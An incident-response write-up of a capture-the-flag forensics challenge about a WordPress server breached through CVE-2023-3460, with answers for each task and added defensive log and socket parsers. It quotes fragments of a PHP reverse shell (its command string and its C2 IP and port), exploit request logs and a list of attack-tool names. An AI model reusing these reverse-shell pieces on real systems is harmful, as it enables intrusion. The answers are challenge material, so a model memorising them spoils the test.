ultimatum

Released: 2024-05-16
Retired: 2024-11-07
Author: CyberJunkie

Scenario

One of the Forela WordPress servers was a target of notorious Threat Actors (TA). The website was running a blog dedicated to the Forela Social Club, where Forela employees can chat and discuss random topics. Unfortunately, it became a target of a threat group. The SOC team believes this was due to the blog running a vulnerable plugin. The IT admin already followed the acquisition playbook and triaged the server for the security team. Ultimately (no pun intended) it is your responsibility to investigate the incident. Step in and confirm the culprits behind the attack and restore this important service within the Forela environment.


Task 01

Question: Which security scanning tool was utilized by the attacker to fingerprint the blog website?

The CatScale collection includes the Apache2 access log at Logs\var\log\apache2\access.log. The scan requests are recorded there, so the tool can be identified from the User-Agent string it sends:

23.106.60.163 - - [08/Aug/2023:08:21:27 +0000] "GET / HTTP/1.1" 200 11596 "http://3.110.136.25/" "WPScan v3.8.24 (https://wpscan.com/wordpress-security-scanner)"

Answer: wpscan/3.8.24


Task 02

Question: Which CVE was exploited by the attacker?

The results of the later tasks identify the vulnerable plugin (Ultimate Member) and the backdoor user created through a public PoC; together these point to the related CVE.

Answer: CVE-2023-3460


Task 03

Question: What was the IP Address utilized by the attacker to exploit the CVE?

The access.log from Task 01 shows the scan and the subsequent requests against the vulnerable plugin's registration page coming from the same IP, so the exploitation of CVE-2023-3460 can be attributed to it:

23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "GET //index.php/register/ HTTP/1.1" 301 295 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "GET /index.php/register/ HTTP/1.1" 200 11367 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "POST //index.php/register/ HTTP/1.1" 302 951 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:34:00 +0000] "GET /index.php/user/secragon/ HTTP/1.1" 200 14335 "-" "Secragon Offensive Agent"

Answer: 23.106.60.163


Task 04

Question: What is the name of the backdoor user added to the blog as part of the exploitation process?

Correlating the publicly known exploit for the CVE identified in Task 02 with the access.log identifies the user created as a backdoor: the POST to the registration page is immediately followed by a request for the new user's profile page.

23.106.60.163 - - [08/Aug/2023:08:34:00 +0000] "GET /index.php/user/secragon/ HTTP/1.1" 200 14335 "-" "Secragon Offensive Agent"

Answer: secragon


Task 05

Question: After the exploit, the SOC team observed that the attacker’s IP address changed and from the logs, it seems that the attacker manually explored the website after logging in. The SOC team believes that the previous IP seen during exploitation was a public cloud IP. What is the IP Address the attacker used after logging in to the site?

Immediately after the creation of the new user, requests from a different IP appear. These and the subsequent requests from that IP in the access.log show malicious behavior (e.g., accessing the planted web shell) and are therefore also attributed to the attacker.

198.16.74.45 - - [08/Aug/2023:08:58:20 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr&load%5Bchunk_0%5D=dashicons,admin-bar,site-health,common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,wp-poi&load%5Bchunk_1%5D=nter,widgets,site-icon,l10n,buttons,wp-auth-check&ver=6.2.2 HTTP/1.1" 200 81088 "http://3.110.136.25/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"

Answer: 198.16.74.45
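As an added example (not part of the original writeup), the following Python script parses access.log lines in Apache combined format and automates the pivots used in Tasks 01, 03, 04 and 05: it flags scanner User-Agents, detects the Ultimate Member registration sequence (POST to /register/ followed by a request for the new profile page) and lists IPs that browse wp-admin without having run the exploit. The embedded log lines are constructed from the entries quoted above, with the long query string trimmed.

```python
import re

# Apache combined log format (assumption: matches the access.log lines quoted above).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
SCANNER_UA = re.compile(r'\b(wpscan|nikto|sqlmap|nuclei)\b', re.I)
PROFILE_RE = re.compile(r'^/+index\.php/user/([^/]+)/')

# Constructed sample modelled on the entries quoted in Tasks 01-05 (query string trimmed).
SAMPLE_LOG = """\
23.106.60.163 - - [08/Aug/2023:08:21:27 +0000] "GET / HTTP/1.1" 200 11596 "http://3.110.136.25/" "WPScan v3.8.24 (https://wpscan.com/wordpress-security-scanner)"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "GET /index.php/register/ HTTP/1.1" 200 11367 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:33:59 +0000] "POST //index.php/register/ HTTP/1.1" 302 951 "-" "Secragon Offensive Agent"
23.106.60.163 - - [08/Aug/2023:08:34:00 +0000] "GET /index.php/user/secragon/ HTTP/1.1" 200 14335 "-" "Secragon Offensive Agent"
198.16.74.45 - - [08/Aug/2023:08:58:20 +0000] "GET /wp-admin/load-styles.php?c=0&dir=ltr HTTP/1.1" 200 81088 "http://3.110.136.25/wp-admin/index.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0"
"""

def parse(text):
    """Yield one dict per line that matches the combined format; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def analyse(text):
    events = list(parse(text))
    # Task 01: fingerprinting tools announce themselves in the User-Agent.
    scanners = {(e['ip'], e['ua']) for e in events if SCANNER_UA.search(e['ua'])}
    # Tasks 03/04: CVE-2023-3460 abuse looks like a POST to the Ultimate Member
    # registration page followed by the same IP fetching the freshly created profile.
    backdoors = []
    for i, e in enumerate(events):
        if e['method'] != 'POST' or '/register/' not in e['path']:
            continue
        for nxt in events[i + 1:]:
            um = PROFILE_RE.match(nxt['path'])
            if nxt['ip'] == e['ip'] and um:
                backdoors.append({'ip': e['ip'], 'user': um.group(1), 'ts': nxt['ts']})
                break
    # Task 05: wp-admin activity from an IP that never ran the exploit is the post-login pivot.
    admin_ips = {e['ip'] for e in events if e['path'].startswith('/wp-admin/')}
    pivots = admin_ips - {b['ip'] for b in backdoors}
    return scanners, backdoors, pivots

if __name__ == '__main__':
    for name, result in zip(('scanners', 'backdoors', 'pivots'), analyse(SAMPLE_LOG)):
        print(name, result)
```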


Task 06

Question: The SOC team has suspicions that the attacker added a web shell for persistent access. Confirm the full path of the web shell on the server.

To facilitate the search for web shells, CatScale automatically collects files with the extensions jsp, asp, aspx, and php and saves the first 1000 lines of each in Misc\ip-172-31-11-131-20230808-0937-pot-webshell-first-1000.txt.

==> /var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php <==
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down. RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 [email protected]

Answer: /var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php


Task 07

Question: What was the value of the $shell variable in the web shell?

The web shell found in Task 06 also contains the variable in question; its value can be read from the same first-1000-lines file.

[...]
$error_a = null;
$shell = 'uname -a; w; id; /bin/bash -i';
$daemon = 0;
[...]

Answer: 'uname -a; w; id; /bin/bash -i';


Task 08

Question: What is the size of the webshell in bytes?

To determine the size of the identified file, another summary file generated by CatScale helps: ip-172-31-11-131-20230808-0937-full-timeline.csv records the collected filesystem metadata as a timeline in CSV format, including the creation of the web shell and its size.

Inode,Hard link Count,Full Path,Last Access,Last Modification,Last Status Change,File Creation,User,Group,File Permissions,File Size(bytes)
[...]
267656,1,/var/www/html/wp-content/themes/twentytwentythree/patterns/hidden-comments.php,2023-08-08 08:58:02.856871375 +0000,2023-08-08 08:58:02.816872892 +0000,2023-08-08 08:58:02.816872892 +0000,-,www-data,www-data,-rw-r--r--,2592

Answer: 2592


Task 09

Question: The SOC team believes that the attacker utilized the webshell to get RCE on the server. Can you confirm the C2 IP and Port?

The configuration for the C2 server is also part of hidden-comments.php; in the first-1000-lines file the relevant excerpt starts at line 656381.

$VERSION = "1.0";
$ip = '43.204.24.76';
$port = 6969;

Answer: 43.204.24.76:6969


Task 10

Question: What is the process ID of the process which enabled the Threat Actor (TA) to gain hands-on access to the server?

With the C2 IP and port identified in Task 09, the associated process can be found in the active network connections captured by CatScale in ip-172-31-11-131-20230808-0937-ss-anepo.txt, at line 202.

tcp  ESTAB  0  0  172.31.11.131:60380  43.204.24.76:6969  users:(("bash",pid=234521,fd=12),("sh",pid=234517,fd=12),("apache2",pid=234471,fd=12)) uid:33 ino:1532880 sk:b <->

Answer: 234521
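As an added example, not from the original writeup, this Python snippet parses `ss -anepo` output like the line above, returns the processes sharing the socket to the C2 endpoint, and flags any established connection held by both a web-server process and a shell, which is the signature of a reverse shell spawned from a web shell. The sample output is constructed around the quoted line; treating the highest pid as the interactive shell assumes pids increase along the fork chain.

```python
import re
from dataclasses import dataclass

# Constructed sample in `ss -anepo` format, built around the line quoted in Task 10.
SS_OUTPUT = """\
tcp  LISTEN  0  511  *:80  *:*  users:(("apache2",pid=234471,fd=4)) uid:33 ino:20001 sk:1 <->
tcp  ESTAB  0  0  172.31.11.131:60380  43.204.24.76:6969  users:(("bash",pid=234521,fd=12),("sh",pid=234517,fd=12),("apache2",pid=234471,fd=12)) uid:33 ino:1532880 sk:b <->
tcp  ESTAB  0  0  172.31.11.131:22  198.16.74.45:51000  users:(("sshd",pid=1200,fd=5)) uid:0 ino:30002 sk:c <->
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=(\d+)\)')
WEB_SERVERS = {'apache2', 'httpd', 'nginx', 'php-fpm'}
SHELLS = {'sh', 'bash', 'dash', 'zsh'}

@dataclass
class Socket:
    state: str
    local: str
    peer: str
    procs: list  # [(comm, pid, fd), ...] in the order ss prints them

def parse_ss(text):
    """Parse the tcp lines of `ss -anepo` output into Socket records."""
    socks = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != 'tcp':
            continue
        procs = [(c, int(p), int(fd)) for c, p, fd in PROC_RE.findall(line)]
        socks.append(Socket(state=f[1], local=f[4], peer=f[5], procs=procs))
    return socks

def c2_holders(text, ip, port):
    """Processes sharing the socket to ip:port and the pid of the interactive shell.
    Assumption: the highest pid is the last fork in the chain (apache2 -> sh -> bash)."""
    for s in parse_ss(text):
        if s.state == 'ESTAB' and s.peer == f'{ip}:{port}':
            return s.procs, max(pid for _, pid, _ in s.procs)
    return [], None

def web_shell_sockets(text):
    """Detection: an established connection held by both a web-server process and a
    shell means a shell was spawned from the web server and inherited the socket."""
    hits = []
    for s in parse_ss(text):
        comms = {c for c, _, _ in s.procs}
        if s.state == 'ESTAB' and comms & WEB_SERVERS and comms & SHELLS:
            hits.append(s)
    return hits

if __name__ == '__main__':
    print(c2_holders(SS_OUTPUT, '43.204.24.76', 6969))
    for s in web_shell_sockets(SS_OUTPUT):
        print('suspicious:', s.local, '->', s.peer, s.procs)
```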


Task 11

Question: What is the name of the script/tool utilized as part of internal enumeration and finding privilege escalation paths on the server?

CatScale lists all executable files in ip-172-31-11-131-20230808-0937-exec-perm-files.txt. One entry (line 868) stands out because it is located under /tmp/ and carries the well-known filename of a recon script.

26bbf01183c7aacf331f9ecdf694d44122e1a089  /tmp/systemd-private-d9287ecaa4c343bfbd0341e9b66e0697-apache2.service-x0W7Fg/tmp/LinEnum.sh

Comparing the SHA-1 with that of the publicly available LinEnum.sh shows the script was dropped unmodified:

Get-FileHash .\LinEnum.sh -Algorithm sha1 | Select-Object Hash
Hash
----
26BBF01183C7AACF331F9ECDF694D44122E1A089

Answer: LinEnum.sh